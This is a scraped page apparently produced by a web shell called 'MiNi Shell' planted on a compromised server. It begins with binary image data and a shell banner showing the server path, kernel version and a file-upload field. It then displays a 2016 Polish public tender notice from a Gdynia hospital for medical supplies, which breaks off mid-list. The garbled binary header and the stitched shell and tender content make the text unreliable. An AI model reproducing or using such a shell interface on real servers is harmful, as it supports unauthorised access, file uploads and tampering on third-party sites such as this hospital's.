JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160212/32162-N-2016.html

<p class="kh_header"><b>Gdynia: Sukcesywne dostawy podstawowych wyrobów medycznych</b><br>
<b>Numer ogłoszenia: 32162 - 2016; data zamieszczenia: 12.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej , ul. Powstania Styczniowego 9b, 81-519 Gdynia, woj. pomorskie, tel. 058 6998605, faks 058 6224871.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ucmmit.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy podstawowych wyrobów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy podstawowych wyrobów medycznych określone w 28 pakietach.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.10.00-0, 33.14.16.20-2, 33.18.15.20-0, 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o zamówienie publiczne w zakresie  dostaw określonych w pakietach 1-28, Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena spełnienia warunku nastąpi na podstawie złożonego wraz z ofertą oświadczenia - wzór Załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić gdy: 1)	w trakcie trwania umowy ulegnie zmianie wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę jeżeli zmiany  te będą miały  wpływ  na koszty  wykonania  dostawy przez Wykonawcę.
2)	w trakcie trwania umowy ulegną zmianie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany  te będą miały  wpływ  na koszty  wykonania dostawy przez Wykonawcę.
Zmiany umowy będą mogły nastąpić również w następujących okolicznościach:
1)	zaistnienia, po zawarciu niniejszej umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
a.	o charakterze niezależnym od stron,
b.	którego strony nie mogły przewidzieć przed zawarciem umowy,
c.	którego nie można uniknąć ani któremu strony nie mogły zapobiec;
-	za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajk, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, promieniowanie lub skażenia,
2)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
3)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z SIWZ, treścią niniejszej umowy i jej załączników określających sposób wykonania zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności sposobu realizacji zamówienia,
4)	wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron,
5)	zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji  albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy (w tym zmiana stawek celnych),
6)	zaistnienie siły wyższej uniemożliwiającej okresowe wykonywanie przedmiotu umowy,
7)	wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane  przez Wykonawcę,
8)	w trakcie trwania umowy Wykonawca zaproponuje obniżoną cenę wyrobu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ucmmit.gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej, ul. Powstania Styczniowego 9b, 81-519 Gdynia, pok 150..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2016 godzina 11:00, miejsce: Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej, ul. Powstania Styczniowego 9b, 81-519 Gdynia, pok 30. Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Dwustronny plaster mocujący do pierścienia  mocującego czujnik mikrodoplera kompatybilny z aparatem Perimed z czujnikiem 307/407  (op min.100szt)	opakowanie	7
2	Pierścień mocujący czujnik mikrodoplera kompatybilny z aparatem Perimed z czujnikiem 307/407 (op. min 100 szt.)	opakowanie	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przyłbica medyczna - jednorazowa osłona na całą twarz. Wykonana w technologii UltraClear, obustronnie pokryta powłoką przeciw parowaniu; optycznie przezroczysta, antystatyczna, przeciwodblaskowa powierzchnia, bezlateksowa; osłona z pianą stałą z elastycznym paskiem. 	sztuka	50
2	Okulary ochronne jednorazowego użytku z wymiennymi soczewkami wykonane w technologii UltraClean- przeciwodblaskowy, przeciw zaparowaniu oraz antystatyczny; oprawkadopasowana do czoło, zakładanie osłonek na oprawę przez tzw klipsy, szybka z kolorowym paskiem w celu zakładania bez odcisków. 	sztuka	100
3	Indywidualny zestaw ochrony biologicznej przeznaczony dla osób pracujacych w warunkach narażenia na kontakt z czynnikami zakaźnymi tj. wirusami,  oraz groźnymi chrobotwórczymi mikroorganizmami. Skuteczność ochrony zgodna z normą EN14126  Skład zestawu: kombinezon ochronny biologicznej(całkowite zabezpieczenie przed wydzielinami chorego pacjenta) - 1 szt, maska biobójcza (norma FFP3 ) - 1 szt, okulary typu google - 1 szt, rękawice ochronne(przeznaczone do pracy o zwiekszonym ryzyku) - 2 pary, pokrowce na buty ochronne - 1 para,ubranie jednorazowego użytku włókninowe (bluza, spodnie, pokrowce) - 1 kpl, worek na odpady - 1 szt. Wymagane dostarczenie próbki kompletu.	sztuka	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do podawania  żywienia pozajelitowego do wykorzystania w pompie perystaltycznej ASCOR S.A (AP31).Długość drenu 230cm, jałowy, na komorze kroplowej  obręcz	sztuka	210.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sonda żołądkowa z prowadnicą, co najmniej dwa otwory z nitką Rtg, dł min 900mm, rozmiar 18CH,16CH, 14CH do wyboru zamawiającego. 	sztuka	50
2	Przezroczysta sonda z silikonu do długoterminowego używania z oznacznikami kontrastującymi w rtg, z obciążona końcówką, żeńskie, elastyczne osadzenie z nasadką, 4 boczne otwory dł  min. 120 cm . Oznaczniki co 5 cm na długości od 45 do 75 cm.	sztuka	20
3	Zgłębniki żołądkowe sterylne,pakowane indywidualnie,końcówka ułatwiająca wprowadzenie,posiadająca znacznik głębokości,potwierdzjacy pozycję.Długość nie mniej niż 80cm.Rozmiar 14,16,18,20 do wyboru zamawiającego	sztuk	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Elektroda neutralna jednorazowa dla dorosłych  dwudzielna o powierzchni 85cm2 z pierścieniem ekwipotencjalnym 23cm2 do diatermii Erbotom ICC 200	sztuka	400
2	Elektroda neutralna wielorazowa dla dorosłych do diatermii Erbotom ICC 200	sztuka	2
3	Kabel do elektrody neutralnej długość 4-5 m do diatermi Erbotom ICC 200	sztuka	4
4	Kabel do jednorazowych elektrod neutralnych długość 4-5m do diatermii Erbotom ICC 200	sztuka	4
5	Kabel do uchwytu z przyciskami długość 4-5m do diatermii Erbotom ICC 200	sztuka	4
6	Uchwyt elektrod monopolarnych z przyciskami  do diatermii Erbotom ICC 200	sztuka	4
7	Nożyk do diatermii Erbotom ICC 200 kompatybilny  z poz 6	sztuka	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wymienne, jednorazowe, papierowe ustniki do spirometru LungTest 500/1000 dla dorosłych	sztuk	450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Maski do ambu dla dorosłych niesterylne, anestetyczne z medycznego PCV. Maska twarzowa jednorazowego użytku do worka samorozprężalnego ukształtowana  zgodnie z budową anatomiczną , posiadająca pompowany mankiet uszczelniający, zaopatrzona w uchwyt do zaczepu pasów mocujących.
Krystalicznie przejrzysta kopuła umożliwiająca obserwację ust pacjenta,  nie zawierająca  lateksu. Rozmiar do wyboru zamawiającego	sztuka	200
2	Maski do ambu dla dzieci niesterylne, anestetyczne z medycznego PCV. Maska twarzowa jednorazowego użytku do worka   samorozprężalnego ukształtowana  zgodnie z budową anatomiczną , posiadająca pompowany mankiet uszczelniający, zaopatrzona w uchwyt do zaczepu pasów mocujących.
Krystalicznie przejrzysta kopuła umożliwiająca obserwację ust pacjenta  nie zawierająca  lateksu. Rozmiar do wyboru zamawiającego	sztuka	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jednorazowe pokrowce na czujnik termometru do pomiaru temperatury w odbycie ,uniemożliwiające kontakt termometru z błoną śluzowa pacjenta.Pokrowce składają się z dwóch powłok zewn i wewn(uniemozliwiająca kontakt termometru z bł sluzową. Format 150 x35mn	sztuka	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igły do wstrzykiwaczy 0,3mn(30G) x 8mn	sztuka	14500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igła biopsyjna o średnicy 16 G lub 12 G i dł 15 cm. Kompatybilna z aparatem Optimed Vitesse; posiadająca możliwosść blokady i zabezpieczenia przez przekręcenie stałego elementu igły; wyposażona w dołkowaną końcówkę wzmacniającą widoczność w usg. Igła posiada markery co 1 cm. Jednorazowa, sterylna, pakowana pojedynczo	sztuka	20.</p></li>
